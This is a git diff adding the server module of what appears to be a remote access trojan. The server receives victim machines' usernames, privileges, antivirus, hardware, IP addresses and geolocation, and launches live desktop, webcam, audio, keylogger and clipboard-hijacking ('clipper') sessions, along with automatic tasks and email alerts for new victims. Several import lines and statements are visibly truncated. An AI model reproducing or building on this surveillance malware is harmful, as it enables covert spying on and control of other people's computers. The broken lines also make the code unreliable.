path: root/server/
diff options
Diffstat (limited to 'server/')
1 files changed, 496 insertions, 0 deletions
diff --git a/server/ b/server/
new file mode 100644
index 0000000..f0017c8
--- /dev/null
+++ b/server/
@@ -0,0 +1,496 @@
+ A vital class taking care of setting
+ up the threads, servers & organizing
+ connecting clients.
+ Verified: 2021 February 8
+ * Follows PEP8
+ * Tested Platforms
+ * Windows 10
+ * Third Party Modules
+ * eel
+from server.helper import ServerHelper, SafeIP
+from server.state import ServerStatic, Dynamic
+from server.modules.desktop import Desktop
+from import Webcam
+from server.modules.logger import Logger
+from server.controller import Controller
+from server.blacklist import Blacklist
+from import Audio
+from server.autotask import Autotask
+from server.database import Database
+from server.settings import Settings
+from server.error import ServerError
+from server.console import Console
+from server.request import Request
+from shared.helper import Helper
+from shared.state import Static
+from server.parse import Parse
+from import Email
+from import Data
+import traceback
+import ipaddress
+import socket
+import time
+if not ServerStatic.TERMINAL:
+ from server.web import Gui
+ import eel
+class ClientType:
+ def __init__(self, socket, data):
+ self.__socket = socket
+ self.__data = data
+ self.__connect_ip = SafeIP(data['connect_ip'])
+ @property
+ def socket(self):
+ return self.__socket
+ @property
+ def data(self):
+ return self.__data
+ @property
+ def connect_ip(self):
+ return self.__connect_ip
+ @property
+ def country(self):
+ return self.__data['country']
+ @property
+ def username(self):
+ return self.__data['username']
+ @property
+ def hostname(self):
+ return self.__data['hostname']
+ @property
+ def privileges(self):
+ return self.__data['privileges']
+ @property
+ def antivirus(self):
+ return self.__data['antivirus']
+ @property
+ def operating_system(self):
+ return self.__data['operating_system']
+ @property
+ def cpu(self):
+ return self.__data['cpu']
+ @property
+ def gpu(self):
+ return self.__data['gpu']
+ @property
+ def ram(self):
+ return self.__data['ram']
+ @property
+ def initial_connect(self):
+ return self.__data['initial_connect']
+ @property
+ def filepath(self):
+ return self.__data['filepath']
+ @property
+ def running(self):
+ return self.__data['running']
+ @property
+ def build_name(self):
+ return self.__data['build_name']
+ @property
+ def build_version(self):
+ return self.__data['build_version']
+ @property
+ def os_version(self):
+ return self.__data['os_version']
+ @property
+ def system_locale(self):
+ return self.__data['system_locale']
+ @property
+ def system_uptime(self):
+ return self.__data['system_uptime']
+ @property
+ def pc_manufacturer(self):
+ return self.__data['pc_manufacturer']
+ @property
+ def pc_model(self):
+ return self.__data['pc_model']
+ @property
+ def mac_address(self):
+ return self.__data['mac_address']
+ @property
+ def external_ip(self):
+ return self.__data['external_ip']
+ @property
+ def local_ip(self):
+ return self.__data['local_ip']
+ @property
+ def timezone(self):
+ return self.__data['timezone']
+ @property
+ def country_code(self):
+ return self.__data['country_code']
+ @property
+ def region(self):
+ return self.__data['region']
+ @property
+ def city(self):
+ return self.__data['city']
+ @property
+ def zip_code(self):
+ return self.__data['zip_code']
+ @property
+ def latitude(self):
+ return self.__data['latitude']
+ @property
+ def longitude(self):
+ return self.__data['longitude']
+class ServerSocket:
+ __TABLE_NAME = 'clients'
+ 'country': 'text',
+ 'connect_ip': 'text',
+ 'username': 'text',
+ 'hostname': 'text',
+ 'privileges': 'text',
+ 'antivirus': 'text',
+ 'operating_system': 'text',
+ 'cpu': 'text',
+ 'gpu': 'text',
+ 'ram': 'text',
+ 'initial_connect': 'text',
+ 'filepath': 'text',
+ 'running': 'text',
+ 'build_name': 'text',
+ 'build_version': 'text',
+ 'os_version': 'text',
+ 'system_locale': 'text',
+ 'system_uptime': 'text',
+ 'pc_manufacturer': 'text',
+ 'pc_model': 'text',
+ 'mac_address': 'text',
+ 'external_ip': 'text',
+ 'local_ip': 'text',
+ 'timezone': 'text',
+ 'country_code': 'text',
+ 'region': 'text',
+ 'city': 'text',
+ 'zip_code': 'text',
+ 'latitude': 'text',
+ 'longitude': 'text'
+ }
+ 'country',
+ 'username',
+ 'hostname',
+ 'privileges',
+ 'antivirus',
+ 'operating_system',
+ 'cpu',
+ 'gpu',
+ 'ram',
+ 'filepath',
+ 'running',
+ 'build_name',
+ 'build_version',
+ 'os_version',
+ 'system_locale',
+ 'system_uptime',
+ 'pc_manufacturer',
+ 'pc_model',
+ 'mac_address',
+ 'external_ip',
+ 'local_ip',
+ 'timezone',
+ 'country_code',
+ 'region',
+ 'city',
+ 'zip_code',
+ 'latitude',
+ 'longitude'
+ }
+ def threads(self):
+ Console.log(f'Started {ServerStatic.NAME}\n',
+ log_type=ServerStatic.ACTION)
+ Helper.thread(self.__listen)
+ Helper.thread(self.__messages)
+ if not ServerStatic.TERMINAL:
+ Helper.thread(Gui.start)
+ @ServerError.thread
+ def __listen(self):
+ with socket.socket((socket.AF_INET6
+ if ipaddress.ip_address(Static.IP).version == 6
+ else socket.AF_INET), socket.SOCK_STREAM) as sock:
+ sock.bind((Static.IP, Static.PORT))
+ sock.listen()
+ while True:
+ conn, (connect_ip, _) = sock.accept()
+ if connect_ip in Blacklist(False).blacklist:
+ Console.log('Blocked Blacklisted IP [{}]\n'.format(
+ connect_ip), Static.WARNING, ServerStatic.ACTION)
+ conn.close()
+ continue
+ try:
+ conn.settimeout(Static.LIVE_TIMEOUT)
+ token = Data.recv(conn, True)
+ if token is None:
+ conn.settimeout(Static.TIMEOUT)
+ self.__client(conn, connect_ip, self.__client_id())
+ else:
+ timer, conn_type, args = Dynamic.TOKENS[token]
+ timer.cancel()
+ del Dynamic.TOKENS[token]
+ Data.send(conn)
+ if conn_type == ServerStatic.DESKTOP:
+ Desktop(conn, token, connect_ip).live(*args)
+ elif conn_type == ServerStatic.WEBCAM:
+ Webcam(conn, token, connect_ip).live(*args)
+ elif conn_type == ServerStatic.AUDIO:
+ Audio(conn, token, connect_ip).live(*args)
+ elif conn_type == ServerStatic.KEYLOGGER:
+ Logger('keylogger', conn,
+ token, connect_ip).live(*args)
+ else:
+ Logger('clipper', conn,
+ token, connect_ip).live(*args)
+ except Exception:
+ Console.log('Connection Handshake Error [{}]\n'.format(
+ connect_ip), Static.WARNING, ServerStatic.ACTION)
+ conn.close()
+ continue
+ def __client_id(self):
+ while True:
+ shortuuid = ServerHelper.uuid()[
+ :ServerStatic.UUID_LENGTH]
+ if shortuuid not in Dynamic.CLIENTS:
+ return shortuuid
+ def __client(self, conn, connect_ip, unique_id):
+ try:
+ try:
+ db = Database()
+ db.create_table(ServerSocket.__TABLE_NAME,
+ **ServerSocket.__TABLE_KWARGS)
+ client_data =
+ ServerSocket.__TABLE_NAME, fetch=1,
+ condition=('connect_ip', '=', connect_ip))
+ db.commit()
+ db.close()
+ except Exception:
+ client_data = []
+ Data.send(conn, (not client_data or Settings.CONNECT_REFRESH,
+ bool(Settings.CONNECT_STICKY)))
+ response = Data.recv(conn, True)
+ self.__verify_connect_handshake(
+ response, not client_data or Settings.CONNECT_REFRESH)
+ if client_data and not Settings.CONNECT_REFRESH:
+ response = dict(zip(
+ ServerSocket.__TABLE_KWARGS, client_data[0]))
+ except Exception:
+ Console.log('Invalid Connect Handshake\n',
+ Static.DANGER, ServerStatic.ACTION)
+ Console.log(traceback.format_exc(),
+ log_type=ServerStatic.TRACEBACK)
+ conn.close()
+ else:
+ if not client_data or (client_data
+ and Settings.CONNECT_REFRESH):
+ response.update(dict(initial_connect=Helper.timestamp(),
+ connect_ip=connect_ip))
+ if not client_data:
+ self.__store_client(response)
+ else:
+ self.__store_client(response, True)
+ client = ClientType(conn, response)
+ Dynamic.CLIENTS[unique_id] = client
+ Helper.thread(self.__connect_work, unique_id, client)
+ def __verify_connect_handshake(self, response, extensive):
+ assert type(response) is dict, \
+ 'Invalid Connect Handshake Data Type'
+ if extensive:
+ assert ServerSocket.__HANDSHAKE_KEYS == response.keys(), \
+ 'Invalid Connect Handshake Keys Data Type'
+ for value in response.values():
+ assert type(value) is str, \
+ 'Invalid Connect Handshake Value Data Type'
+ else:
+ assert response == Data.message(), 'Invalid Connect Handshake'
+ @ServerError.quiet
+ def __store_client(self, response, update=False):
+ db = Database()
+ if update:
+ db.update(ServerSocket.__TABLE_NAME, (
+ 'connect_ip', '=', response['connect_ip']),
+ **dict([(category, response[category]) for
+ category in ServerSocket.__TABLE_KWARGS]))
+ else:
+ db.write(ServerSocket.__TABLE_NAME, [
+ response[category] for category
+ in ServerSocket.__TABLE_KWARGS])
+ db.commit()
+ db.close()
+ @ServerError.quiet
+ def __connect_work(self, unique_id, client):
+ Console.log('Connected Client [{} {} {}]\n'.format(
+ client.connect_ip.pure, ServerStatic.SEPERATOR,
+ unique_id), Static.SUCCESS, ServerStatic.ACTION)
+ self.__terminal_alert(unique_id, client)
+ self.__gui_alert(unique_id, client)
+ self.__autotask(unique_id)
+ if Settings.EMAIL_ALERT:
+ success = Email(
+ Settings.EMAIL_SENDER,
+ ).send(
+ f'New Client Connected ({unique_id})',
+ 'Connection Notification',
+ ''.join([
+ '<b>{}: {}</b><br />'.format(
+ display_name,[data_key])
+ for display_name, data_key
+ in ServerStatic.CATEGORIES]))
+ if success:
+ Console.log('Connect Email Sent [{} {} {}]\n'.format(
+ client.connect_ip.pure, ServerStatic.SEPERATOR,
+ unique_id), log_type=ServerStatic.ACTION)
+ else:
+ Console.log('Connect Email Failed To Send [{} {} {}]\n'.format(
+ client.connect_ip.pure, ServerStatic.SEPERATOR,
+ unique_id), Static.WARNING, ServerStatic.ACTION)
+ @ServerError.quiet
+ def __terminal_alert(self, unique_id, client):
+ if Settings.TERMINAL_ALERT:
+ Console.printf('Client Connected [{} {} {}]'.format(
+ client.connect_ip.pure, ServerStatic.SEPERATOR,
+ unique_id), Static.INFO, newline=True)
+ @ServerError.quiet
+ def __gui_alert(self, unique_id, client):
+ if not ServerStatic.TERMINAL:
+ if eel._websockets != []:
+ eel.clientAddEel(unique_id,,
+ Settings.GUI_ALERT)
+ @ServerError.quiet
+ def __autotask(self, unique_id):
+ db = Database()
+ db.execute('CREATE TABLE IF NOT EXISTS {} ({})'.format(
+ Autotask.TABLE_NAME, Database.parse(Autotask.TABLE_KWARGS)))
+ db.commit()
+ db.close()
+ for request_type, in Autotask(False).autotask:
+ result = Parse.parse_string(Parse.parse_alias(request_type))
+ lower = Data.lower(result, False)
+ if lower in ServerStatic.SESSION:
+ Parse.execute(lower, result, False, ([unique_id], True))
+ else:
+ Controller.message(False, result, custom=([unique_id], True))
+ @ServerError.thread
+ def __messages(self):
+ if ServerStatic.TERMINAL:
+ Static.INTERVAL = Static.ALIVE
+ timer = time.time()
+ while True:
+ if time.time() - timer > ServerStatic.PING_INTERVAL:
+ if not ServerStatic.TERMINAL:
+ if (Settings.GUI_UPDATE
+ and eel._websockets != []):
+ interval = Static.INTERVAL
+ else:
+ interval = Static.ALIVE
+ else:
+ interval = Static.ALIVE
+ Controller.message(False, Data.message(interval),
+ custom=(Dynamic.CLIENTS, False))
+ timer = time.time()
+ if Dynamic.MESSAGES:
+ for message in Dynamic.MESSAGES:
+ try:
+ if message[0]:
+ Dynamic.RESULT = Request(
+ *message[1], **message[2]).send()
+ else:
+ Request(*message[1], **message[2]).send()
+ except Exception as error:
+ Console.log('[REQUEST] Internal Server Error\n',
+ Static.DANGER, ServerStatic.ACTION)
+ Console.log(traceback.format_exc(),
+ log_type=ServerStatic.TRACEBACK)
+ Console.printf(Helper.join(
+ '[REQUEST] Internal Server Error',
+ f'{type(error).__name__}: {error}'
+ ), Static.DANGER, newline=True)
+ finally:
+ Dynamic.MESSAGES.remove(message)
+ else:
+ time.sleep(.1)